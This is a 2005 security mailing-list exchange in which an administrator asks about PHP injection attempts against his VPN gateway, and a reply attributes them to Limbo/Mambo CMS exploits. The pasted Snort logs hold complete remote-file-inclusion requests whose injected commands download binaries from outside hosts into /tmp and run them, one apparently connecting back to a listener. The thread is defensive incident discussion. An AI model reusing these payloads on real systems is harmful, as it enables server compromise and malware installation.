[Dshield] PHP injection attacks

Meidinger Chris chris.meidinger at badenIT.de
Thu Dec 22 09:58:32 GMT 2005


Hi,

This is the same thing David just asked about. 

It looks like you're right, that it's not mambo but limbo CMS. Apparently they both use similar code or libraries.

I can't imaging your VPN-Gateway being susceptible to the attacks with or without patches. They seem to be for limbo running on apache running on *nix. That is very unlikely to be a part of your VPN setup.

What does a packet dump show you? Is your box sending out 404's ??

Cheers,

Chris

-----Original Message-----
From: list-bounces at lists.dshield.org on behalf of tfischer at oldenburggroup.com
Sent: Thu 22-Dec-05 04:25
To: list at lists.dshield.org
Subject: [Dshield] PHP injection attacks
 

   I have started to see exploit attempts against my VPN. I believe I have
identified them as:
 FrSIRT advisory 12/15/05 - ADV-2005-2932  CVE-2005-4317 CVE-2005-4318
CVE-2005-4319 CVE-2005-4320
   I called my VPN vendor to see if they were susceptible to this type of
attack. They said that as long as I had the latest patches I should be fine.
I asked them why the device does not log the attempts. They said they didn't
know, but there was no need to worry as long as the patches were in. The
attacks are only being directed at this box. They come in sets of 5 or 6.
There was one set Monday night, 6 yesterday and 50 so far today. Does anyone
know if this pattern has been automated and I'm just seeing some bots out
there searching? Anyone else seeing this?
   Here are some of the SNORT logs:

GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_c
ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.
111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;
./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%2021
6.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos
Config_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.
15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBAL
S=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%
20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_
content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.13
0.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./
sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_c
ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130
.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./s
exy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066
.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%2
0YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos
Config_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.2
35.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20Y
YY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)



_________________________________________
Learn about Intrusion Detection in Depth from the comfort of your own couch:
https://www.sans.org/athome/details.php?id=1341&d=1

_______________________________________________
send all posts to list at lists.dshield.org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list



More information about the list mailing list